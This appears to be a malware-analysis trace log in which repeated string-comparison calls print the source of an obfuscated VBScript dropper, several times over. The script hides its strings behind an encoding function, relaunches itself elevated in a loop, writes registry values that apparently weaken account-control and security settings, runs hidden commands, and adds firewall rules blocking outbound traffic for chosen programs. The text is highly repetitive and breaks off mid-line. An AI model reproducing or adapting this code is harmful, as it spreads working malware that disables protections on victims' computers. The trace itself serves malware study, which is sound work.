CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.354] wcsncmp (_String1="newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.354] wcsncmp (_String1="ewRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.354] wcsncmp (_String1="wRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.355] wcsncmp (_String1="Rule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.355] wcsncmp (_String1="ule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 